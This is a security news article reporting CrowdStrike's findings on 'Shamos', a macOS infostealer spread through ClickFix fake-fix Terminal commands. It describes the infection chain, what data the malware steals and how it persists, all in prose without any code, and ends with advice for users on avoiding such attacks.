A new wave of macOS-targeting malware has surfaced, and it is catching unsuspecting users off guard with fake troubleshooting fixes. The newly discovered malware, dubbed “Shamos”, is a dangerous infostealer developed by the cybercriminal group known as COOKIE SPIDER. According to CrowdStrike, Shamos has already attempted infections in over 300 monitored environments worldwide since June 2025, raising alarms across the cybersecurity industry.
The attackers distribute Shamos through ClickFix attacks—a social engineering tactic where victims are tricked into pasting commands into the macOS Terminal under the guise of resolving system issues. These commands appear to fix problems like printer errors or system crashes but instead download and execute malicious payloads. The fake fixes are promoted through malvertising campaigns, spoofed GitHub repositories, and even sponsored Google results on domains such as mac-safer[.]com and rescue-mac[.]com.
Once users copy and paste the provided commands, the malware retrieves a Base64-encoded URL, which then fetches a malicious Bash script from a remote server. This script captures the victim’s password, downloads the Shamos Mach-O executable, and bypasses Gatekeeper protections using xattr and chmod commands. By doing so, Shamos ensures its malicious code runs without triggering standard macOS defenses.
Once installed, Shamos runs anti-VM checks to evade detection in sandboxes, then executes reconnaissance via AppleScript commands. It targets:
- Keychain data
- Apple Notes
- Cryptocurrency wallets
- Web browser credentials and stored data
All harvested information is compressed into a file named out.zip and exfiltrated to the attacker’s server using curl. In cases where attackers gain sudo privileges, Shamos creates a persistence mechanism by installing a LaunchDaemon plist file, ensuring it runs automatically on system startup. Beyond data theft, Shamos has been seen deploying spoofed Ledger Live wallet apps and even botnet modules, signaling its versatility as a multipurpose threat.
ClickFix attacks are not new but have become increasingly prevalent across multiple platforms. Threat actors have embedded these tactics in TikTok videos, fake captchas, and Google Meet error pages. The simplicity of convincing a user to paste a command makes this strategy highly effective, even against technically savvy users. Alarmingly, the same delivery method has also been leveraged in ransomware campaigns and state-sponsored cyber-espionage operations.
Cybersecurity experts emphasize that macOS users should never execute commands from online sources unless they fully understand their purpose. GitHub, despite its legitimacy, remains a common platform for malware distribution. Users should rely on Apple’s official support forums or the system’s built-in Help tool instead of clicking on suspicious ads or search results. CrowdStrike’s findings underline the urgency for users to adopt a “zero trust” approach to unverified fixes.
The rise of Shamos demonstrates how clever social engineering and technical evasion can bypass user caution and system defenses. By disguising itself as a solution, Shamos turns curiosity and trust into vulnerabilities. As ClickFix campaigns grow in sophistication, awareness remains the strongest defense. Users and organizations must approach troubleshooting advice online with skepticism, avoiding quick fixes from unknown sources. Shamos is just the latest example proving that in cybersecurity, if it looks too helpful to be true, it probably is.
